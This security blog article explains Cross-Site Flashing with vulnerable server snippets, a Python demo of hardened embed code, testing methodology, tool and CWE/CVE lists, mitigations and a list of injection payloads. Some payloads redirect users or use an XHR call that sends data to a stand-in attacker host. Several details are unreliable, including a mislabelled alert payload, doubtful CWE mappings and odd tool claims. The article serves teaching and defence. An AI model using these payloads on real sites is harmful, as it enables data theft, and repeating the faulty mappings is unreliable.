20 Feb, 2023

Cross-Site Flashing

Cross-Site Flashing (XSF) is a type of web application vulnerability that can allow an attacker to inject malicious Adobe Flash files (SWF files) into a legitimate website, which can then be executed by unsuspecting users who visit the compromised site. XSF can occur when a website fails to properly validate user input or to sanitize data that is used in Flash object parameters, allowing an attacker to inject their own Flash content into a vulnerable website.

Examples of vulnerable code in different programming languages:

• in PHP:

    $param = $_GET['param'];   // untrusted input, used without validation or encoding
    echo "<embed src='myflash.swf?param=".$param."' />";

In this code, the script takes an input parameter ‘param’ from the URL query string and directly embeds it into the Flash object source attribute. If the attacker is able to inject malicious Flash code into the ‘param’ parameter, it will be executed on the client-side, leading to a potential XSF attack.

• in ASP.NET:

    string param = Request.QueryString["param"];   // untrusted input, used without validation or encoding
    Response.Write("<embed src='myflash.swf?param=" + param + "' />");

Similar to the PHP code, this ASP.NET script takes an input parameter ‘param’ from the URL query string and directly embeds it into the Flash object source attribute. An attacker could exploit this vulnerability by injecting malicious Flash code into the ‘param’ parameter, leading to a potential XSF attack.

• in Java Servlets:

    String param = request.getParameter("param");   // untrusted input, used without validation or encoding
    response.getWriter().println("<embed src='myflash.swf?param=" + param + "' />");

In this Java Servlet code, the script takes an input parameter ‘param’ from the HTTP request and directly embeds it into the Flash object source attribute. An attacker could exploit this vulnerability by injecting malicious Flash code into the ‘param’ parameter, leading to a potential XSF attack.
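The three snippets above share one defect: the query-string value is concatenated into the src attribute without validation or encoding. The following Python is an added example, not code from the original article, that puts the vulnerable builder beside two hardened forms (output encoding only, and allow-list plus encoding with the plugin attributes locked down). The SWF name is the article's, the probe string and allow-list are constructed for the demo.

```python
import html
import re
from urllib.parse import quote

# Constructed values for this example (not from the original article).
SWF_PATH = "myflash.swf"                             # the article's example SWF name
PARAM_ALLOWED = re.compile(r"[A-Za-z0-9_-]{1,64}")  # allow-list for 'param' (assumed)


def vulnerable_embed(param):
    """Mirrors the article's PHP/ASP.NET/Servlet snippets: the raw value is
    concatenated into the src attribute with no validation or encoding."""
    return "<embed src='" + SWF_PATH + "?param=" + param + "' />"


def encoded_embed(param):
    """Output encoding only: URL-encode the value for the query string, then
    HTML-encode the whole attribute value. The input can no longer close the
    attribute or the tag, but any string is still forwarded to the SWF."""
    url = SWF_PATH + "?param=" + quote(param, safe="")
    return '<embed src="' + html.escape(url, quote=True) + '" />'


def accepted(param):
    """True when the value is in the allow-list (exact match, no partial)."""
    return PARAM_ALLOWED.fullmatch(param) is not None


def safe_embed(param):
    """Allow-list plus encoding, with the plugin bridge and networking turned
    off so the SWF gets no JavaScript access and no network from this page."""
    if not accepted(param):
        raise ValueError("param rejected: not in allow-list")
    url = SWF_PATH + "?param=" + quote(param, safe="")
    return ('<embed src="' + html.escape(url, quote=True) + '"'
            ' type="application/x-shockwave-flash"'
            ' allowScriptAccess="never" allowNetworking="none" />')


def attribute_breakout(markup):
    """Demo heuristic: True if the generated markup contains more than one
    opening tag, i.e. the input closed the embed tag early."""
    return len(re.findall(r"<[A-Za-z]", markup)) > 1


# Constructed probe: closes the src attribute and the tag, then adds markup.
PROBE = "x' /><b>injected</b><embed src='"


def demo():
    """Summarise how each builder handles the probe and a normal value."""
    return {
        "vulnerable_breakout": attribute_breakout(vulnerable_embed(PROBE)),
        "encoded_breakout": attribute_breakout(encoded_embed(PROBE)),
        "safe_rejects_probe": not accepted(PROBE),
        "safe_normal_value": safe_embed("intro"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```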

Examples of exploiting Cross-Site Flashing

Stealing sensitive information:

An attacker could inject malicious Flash content into a legitimate website, which then steals sensitive information from the unsuspecting users who visit the compromised site. For example, the attacker could create a fake login form within the malicious Flash content, which prompts the user to enter their login credentials. These credentials would then be sent to the attacker’s server, giving them access to the victim’s account.

Spreading malware:

The attacker could inject a Flash file with malware that automatically downloads and installs on the victim’s computer when they visit the compromised website. The malware could perform various malicious activities such as logging keystrokes, capturing screenshots, stealing personal information, or even making the victim’s computer part of a botnet.

Defacing the website:

An attacker could inject a Flash file that alters the appearance of the website or displays offensive content. This could damage the reputation of the website and cause loss of business.

Redirecting to malicious sites:

The attacker could inject a Flash file that redirects the victim to a malicious website, which could further exploit the user’s system with other types of attacks, such as phishing or drive-by download attacks.

Privilege escalation techniques for Cross-Site Flashing

Exploiting vulnerabilities in the victim’s web browser:

Once the attacker has injected malicious Flash content into the victim’s system, they may try to exploit vulnerabilities in the victim’s web browser to gain further access. This could include exploiting known vulnerabilities or using zero-day exploits to bypass security mechanisms and gain elevated privileges.

Using the Flash plugin to run arbitrary code:

Since the Adobe Flash plugin has broad access to the victim’s system, an attacker may use the Flash file to execute arbitrary code on the victim’s machine. This could include downloading and running additional malware or performing other types of attacks to escalate their privileges.

Leveraging other types of vulnerabilities:

An attacker may use XSF in conjunction with other types of vulnerabilities to escalate their privileges. For example, the attacker could use XSF to inject malicious code into a website and then use a separate vulnerability to gain root-level access to the victim’s system.

Social engineering attacks:

An attacker may use social engineering techniques to trick the victim into running the malicious Flash file with elevated privileges. This could involve convincing the user to disable security mechanisms or to run the Flash file with administrator privileges.

General methodology and checklist for Cross-Site Flashing

Methodology:

  1. Identify areas of the website that use Flash: Identify all the areas of the website where Flash is used, including areas that allow user input or file uploads.

  2. Use a proxy tool to capture HTTP traffic: Use a proxy tool such as Burp Suite to capture and analyze HTTP traffic between the web server and the web browser. This will help identify requests and responses that contain Flash files.

  3. Modify the parameters of the Flash file: Modify the parameters of the Flash file and observe the behavior of the website. This will help identify whether the Flash file is vulnerable to XSF attacks.

  4. Test for known XSF vulnerabilities: Test for known XSF vulnerabilities in the Flash file, such as the ability to pass parameters to the Flash file that allow for cross-site scripting attacks.

  5. Test for privilege escalation: Test for privilege escalation by trying to exploit any known vulnerabilities in the Flash plugin or other parts of the system. This could include attempting to download and execute arbitrary code, gain access to sensitive information, or take control of the victim’s system.

  6. Document and report any vulnerabilities: Document any vulnerabilities that are discovered and report them to the website owner or the appropriate authorities. Include a detailed explanation of the vulnerability, the potential impact, and steps for remediation.

  7. Retest after fixes are applied: Retest the website after any fixes are applied to ensure that the vulnerabilities have been properly addressed and that the website is no longer vulnerable to XSF attacks.

Checklist:

  1. Identify all areas of the website where Flash is used, including areas that allow user input or file uploads.

  2. Check for Flash-based advertisements, widgets, or other third-party content that may be embedded in the website.

  3. Use a proxy tool such as Burp Suite to capture and analyze HTTP traffic between the web server and the web browser.

  4. Check for the presence of any user-controllable parameters in the Flash file.

  5. Modify the parameters of the Flash file and observe the behavior of the website.

  6. Check for the ability to pass parameters to the Flash file that allow for cross-site scripting attacks.

  7. Test for known XSF vulnerabilities in the Flash file or other components of the system.

  8. Check for the ability to download and execute arbitrary code using the Flash file.

  9. Test for privilege escalation by attempting to gain access to sensitive information or control of the victim’s system.

  10. Document any vulnerabilities that are discovered and report them to the website owner or the appropriate authorities.

  11. Retest the website after any fixes are applied to ensure that the vulnerabilities have been properly addressed and that the website is no longer vulnerable to XSF attacks.

Tool set for Cross-Site Flashing

Manual Tools:

  • Adobe Flash Debugger – a standalone tool for analyzing and debugging Flash files, which can be used to identify XSF vulnerabilities in a Flash file.

  • SWFScan – a tool for scanning SWF files for vulnerabilities, including XSF attacks. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • SWF Decompiler – a tool for decompiling and analyzing SWF files, which can be used to identify XSF vulnerabilities in the Flash file. It can also be used to modify the Flash file and test for privilege escalation.

  • Wireshark – a network analysis tool that can be used to capture and analyze network traffic between the web server and the web browser, which can help identify XSF attacks.

  • Firebug – a web development tool that can be used to inspect and modify the parameters of Flash files, which can help identify and exploit XSF vulnerabilities.

Automated Tools:

  • Acunetix – a web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • AppSpider – a web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • Burp Suite – a web application testing tool that includes a proxy server, which can be used to capture and analyze HTTP traffic between the web server and the web browser. It can also be used to test for XSF vulnerabilities and privilege escalation.

  • ZAP – an open-source web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • Netsparker – a web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • Nmap – a network mapping tool that can be used to identify open ports and services on a target system, which can help identify XSF vulnerabilities.

  • sqlmap – a tool for detecting and exploiting SQL injection vulnerabilities in a website, which can be used to identify and exploit XSF vulnerabilities.

  • Metasploit – a penetration testing tool that includes a wide range of exploits and payloads, which can be used to test for XSF vulnerabilities and privilege escalation.

  • Grendel-Scan – an open-source web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • Vega – an open-source web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

Browser Plugins:

  • Flashblock – a browser plugin that blocks all Flash content by default, which can help protect against XSF attacks.

  • NoScript – a browser plugin that blocks all JavaScript by default, which can help protect against XSF attacks that rely on JavaScript.

  • Ghostery – a browser plugin that blocks third-party tracking scripts, including Flash-based tracking, which can help protect against XSF attacks.

  • uBlock Origin – a browser plugin that blocks ads and other unwanted content, including Flash-based ads, which can help protect against XSF attacks.

  • ScriptSafe – a browser plugin that blocks scripts and other active content, including Flash-based content, which can help protect against XSF attacks.

Average CVSS score of Cross-Site Flashing

The Common Vulnerability Scoring System (CVSS) provides a way to evaluate the severity of security vulnerabilities. The CVSS score is a numeric value ranging from 0 to 10, where 10 represents the most severe vulnerabilities.

The CVSS score of Cross-Site Flashing (XSF) vulnerabilities can vary depending on the specific vulnerability and its impact. In general, XSF vulnerabilities can have a high impact on web application security, as they can be used to steal sensitive information, compromise user accounts, or take over the entire web application.

The CVSS score of XSF vulnerabilities typically falls in the range of 5 to 9, with some vulnerabilities scoring higher or lower than that. However, it’s worth noting that the CVSS score is just one factor to consider when evaluating the severity of a vulnerability. Other factors, such as the likelihood of the vulnerability being exploited, the potential impact on the system or application, and the ease of exploitation, should also be taken into account.

The Common Weakness Enumeration (CWE)

CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) – XSF can be used in combination with cross-site scripting (XSS) to inject malicious code into web pages.

CWE-352: Cross-Site Request Forgery (CSRF) – XSF can be used to trick users into executing CSRF attacks, which can lead to unauthorized actions on the website.

CWE-434: Unrestricted Upload of File with Dangerous Type – XSF can be used to bypass file type validation and upload malicious files, such as Flash files, to the web server.

CWE-539: Use of Persistent Cookies Containing Sensitive Information – XSF can be used to steal sensitive information stored in persistent cookies, such as session IDs.

CWE-565: Reliance on Cookies without Validation and Integrity Checking – XSF can be used to modify or delete cookies, which can lead to session hijacking or other attacks.

CWE-613: Insufficient Session Expiration – XSF can be used to extend the lifetime of a user’s session, allowing attackers to maintain access to the user’s account.

CWE-807: Reliance on Untrusted Inputs in a Security Decision – XSF can be used to manipulate security decisions made by the web application, such as access control or authorization checks.

CWE-815: Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) – XSF can be used to inject special characters, such as HTML tags or XML entities, into web pages, leading to special element injection attacks.

CWE-918: Server-Side Request Forgery (SSRF) – XSF can be used to execute SSRF attacks, which can allow attackers to access internal resources and systems.

CWE-933: Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP File Inclusion’) – XSF can be used to bypass file inclusion protection in PHP applications and execute arbitrary code.

CVEs related to Cross-Site Flashing

CVE-2017-8406 – An issue was discovered on D-Link DCS-1130 devices. The device provides a crossdomain.xml file with no restrictions on who can access the webserver. This allows a Flash file hosted on any domain to make calls to the device’s webserver and pull any information that is stored on the device. In this case, users’ credentials are stored in clear text on the device and can be pulled easily. It also seems that the device does not implement any cross-site scripting forgery protection mechanism, which allows an attacker to trick a user who is logged in to the web management interface into executing a cross-site flashing attack on the user’s browser and execute any action on the device provided by the web management interface, which steals the credentials from the tools_admin.cgi file’s response and displays them inside a text field.

CVE-2015-8760 – The Flvplayer component in TYPO3 6.2.x before 6.2.16 allows remote attackers to embed Flash videos from external domains via unspecified vectors, aka “Cross-Site Flashing.”

Cross-Site Flashing exploits

BeEF (Browser Exploitation Framework) – BeEF is a tool that uses XSF to exploit vulnerable web browsers and execute commands on the victim’s computer.

SWF Injection – SWF Injection is a technique that uses XSF to inject malicious Flash files into web pages, which can be used to steal sensitive information or take over the user’s computer.

XSS+Flash – XSS+Flash is an attack that combines XSF with cross-site scripting (XSS) to execute malicious Flash code in a victim’s web browser.

Clickjacking with Flash – Clickjacking with Flash is an attack that uses XSF to place a transparent Flash object over a web page, tricking users into clicking on hidden buttons or links.

CSRF with Flash – CSRF with Flash is an attack that uses XSF to execute Cross-Site Request Forgery (CSRF) attacks, allowing an attacker to perform unauthorized actions on a victim’s behalf.

Flash-Based Redirection – Flash-Based Redirection is an attack that uses XSF to redirect a victim’s web browser to a malicious website or exploit kit.

Flash Parameter Injection – Flash Parameter Injection is an attack that uses XSF to manipulate Flash file parameters, which can be used to exploit vulnerabilities in the Flash player and execute arbitrary code.

Cookie Injection – Cookie Injection is an attack that uses XSF to inject a malicious Flash file into a user’s browser, which can be used to steal sensitive information from cookies, such as session IDs.

SWF Upload Vulnerabilities – SWF Upload Vulnerabilities are XSF vulnerabilities that allow attackers to upload malicious Flash files to a web server and execute arbitrary code.

Flash-Based Cross-Domain Scripting – Flash-Based Cross-Domain Scripting is an attack that uses XSF to execute scripts across different domains, which can be used to steal sensitive information or perform unauthorized actions on other websites.

Practicing testing for Cross-Site Flashing

Use vulnerable web applications – Look for web applications that are known to be vulnerable to XSF and use them to practice identifying and exploiting XSF vulnerabilities. You can find vulnerable applications on websites like OWASP or VulnHub.

Set up your own test environment – You can set up a test environment with a web server and vulnerable web applications to practice testing for XSF. You can use tools like DVWA (Damn Vulnerable Web Application) or Mutillidae to create a vulnerable environment.

Use automated tools – There are several automated tools available that can help you identify XSF vulnerabilities in web applications. Tools like Burp Suite, OWASP ZAP, and Acunetix can help you identify XSF vulnerabilities quickly and easily.

Practice manual testing – Manual testing involves inspecting the source code of web applications and manually identifying XSF vulnerabilities. You can use tools like Fiddler or Wireshark to intercept HTTP requests and responses, and inspect the code for XSF vulnerabilities.

Participate in CTF events – Capture the Flag (CTF) events often include challenges related to XSF and other web application vulnerabilities. Participating in these events can help you practice identifying and exploiting XSF vulnerabilities in a competitive environment.

Attend training courses – There are several training courses available that can teach you how to test for XSF and other web application vulnerabilities. You can attend courses offered by organizations like SANS or Offensive Security to learn more about XSF testing.

Resources for studying Cross-Site Flashing

OWASP

The Open Web Application Security Project (OWASP) is a non-profit organization that provides resources and tools to help organizations improve the security of their web applications. Their website includes a dedicated page on XSF, which provides an overview of the vulnerability and some techniques for testing for it.

SANS 

SANS is a training and certification organization that offers several courses related to web application security, including courses on XSF. These courses are designed for both beginners and experienced professionals, and cover topics like XSF testing techniques, exploitation, and mitigation.

Web Application Hacker’s Handbook 

The Web Application Hacker’s Handbook is a popular book that covers a wide range of web application vulnerabilities, including XSF. The book provides an in-depth look at XSF, including how the vulnerability works, common exploitation techniques, and mitigation strategies.

Burp Suite 

Burp Suite is a popular web application security testing tool that includes features for identifying XSF vulnerabilities. Burp Suite includes both automated and manual testing features for XSF, as well as tools for exploiting and mitigating the vulnerability.

YouTube

YouTube includes many videos related to XSF, including tutorials, walkthroughs, and demonstrations. Some popular channels that cover XSF and other web application security topics include Hackersploit, IppSec, and LiveOverflow.

Books covering Cross-Site Flashing

The Web Application Hacker’s Handbook by Dafydd Stuttard and Marcus Pinto – This book covers a wide range of web application vulnerabilities, including XSF. The authors provide an in-depth look at XSF, including how the vulnerability works, common exploitation techniques, and mitigation strategies.

Web Application Security: A Beginner’s Guide by Bryan Sullivan and Vincent Liu – This book provides an introduction to web application security, including a section on XSF. The authors cover the basics of XSF, including how the vulnerability works and how to identify and exploit it.

Hacking Exposed Web Applications by Joel Scambray, Vincent Liu, and Caleb Sima – This book covers a wide range of web application vulnerabilities, including XSF. The authors provide an overview of XSF, including how the vulnerability works, common exploitation techniques, and mitigation strategies.

The Tangled Web: A Guide to Securing Modern Web Applications by Michal Zalewski – This book covers a wide range of web application vulnerabilities, including XSF. The author provides an in-depth look at XSF, including how the vulnerability works, common exploitation techniques, and mitigation strategies.

Mastering Modern Web Penetration Testing by Prakhar Prasad – This book provides an in-depth look at web application security, including a section on XSF. The author covers the basics of XSF, including how the vulnerability works and how to identify and exploit it.

Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz – This book covers a wide range of hacking topics, including web application security and XSF. The author provides examples of XSF exploits using Python.

Python Web Penetration Testing Cookbook by Cameron Buchanan, Terry Ip, Andrew Mabbitt, and Benjamin May – This book provides an introduction to web application security testing using Python, including a section on XSF. The authors cover the basics of XSF, including how the vulnerability works and how to identify and exploit it.

The Basics of Hacking and Penetration Testing by Patrick Engebretson – This book provides an introduction to hacking and penetration testing, including a section on web application security and XSF. The author covers the basics of XSF, including how the vulnerability works and how to identify and exploit it.

Real-World Bug Hunting: A Field Guide to Web Hacking by Peter Yaworski – This book provides an introduction to web application security testing, including a section on XSF. The author covers the basics of XSF, including how the vulnerability works and how to identify and exploit it.

Web Application Security Testing with Burp Suite by Sunny Wear – This book provides an introduction to web application security testing using the popular tool, Burp Suite. The author covers the basics of XSF, including how the vulnerability works and how to identify and exploit it using Burp Suite.

List of payloads for Cross-Site Flashing

A simple alert box that can be triggered by the injected Flash content.

    String param = request.getParameter("param");
    response.getWriter().println("<embed src='myflash.swf?param=" + param + "' />");


An iframe that loads a malicious page within the vulnerable page.

    <embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<iframe src='https://malicious-site.com/'></iframe>"/>

An image tag that is replaced with a malicious script.

    <embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<img src=x onerror=alert('XSF exploit!') />"/>

A redirect to a malicious page.

    <embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<script>window.location='http://malicious-site.com/'</script>"/>

An XHR (XMLHttpRequest) request that steals sensitive information from the user.

    <embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<script>var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://malicious-site.com/stolen-data', true); xhr.send();</script>"/>

How to be protected from Cross-Site Flashing

  1. Keep your web browser and Flash player up to date with the latest security patches.

  2. Use a browser that has built-in protections against XSF attacks, such as Google Chrome or Mozilla Firefox.

  3. Install a browser extension that blocks Flash content, such as Flashblock.

  4. Disable the Flash plugin in your web browser unless it is absolutely necessary for a particular website or application.

  5. Use a content security policy (CSP) to restrict the types of content that can be loaded by your web pages.

  6. Implement proper input validation and output encoding in your web applications to prevent injection of malicious Flash content.

  7. Regularly scan your web applications for vulnerabilities using automated tools and/or manual testing.

  8. Train your employees and users to recognize and avoid social engineering attacks that may be used to exploit XSF vulnerabilities.

Mitigations for Cross-Site Flashing

  1. Implement proper input validation and output encoding in your web applications to prevent injection of malicious Flash content.

  2. Use a content security policy (CSP) to restrict the types of content that can be loaded by your web pages, including Flash content.

  3. Disable the Flash plugin in your web browser unless it is absolutely necessary for a particular website or application.

  4. Use a browser that has built-in protections against XSF attacks, such as Google Chrome or Mozilla Firefox.

  5. Install a browser extension that blocks Flash content, such as Flashblock.

  6. Keep your web browser and Flash player up to date with the latest security patches.

  7. Regularly scan your web applications for vulnerabilities using automated tools and/or manual testing.

  8. Train your employees and users to recognize and avoid social engineering attacks that may be used to exploit XSF vulnerabilities.

  9. Use a web application firewall (WAF) that can detect and block XSF attacks.

  10. Implement a secure software development lifecycle (SDLC) to minimize the risk of XSF vulnerabilities in your web applications.

Conclusion

Cross-Site Flashing (XSF) is a web application security vulnerability that can be used by attackers to inject and execute malicious Flash content on a victim’s web browser. XSF attacks can result in a range of consequences, from stealing sensitive data to taking control of the victim’s computer.

To protect against XSF attacks, web developers and website owners should implement input validation, output encoding, and content security policies in their web applications. Users can also take steps to protect themselves, such as keeping their web browsers and Flash players up to date, disabling the Flash plugin when it is not needed, and using a browser that has built-in protections against XSF attacks.

Overall, the key to preventing XSF attacks is to implement a comprehensive approach to web application security that includes secure coding practices, regular vulnerability assessments, and user education. By taking a proactive approach to security, organizations can reduce the risk of XSF attacks and protect against other types of web-based threats.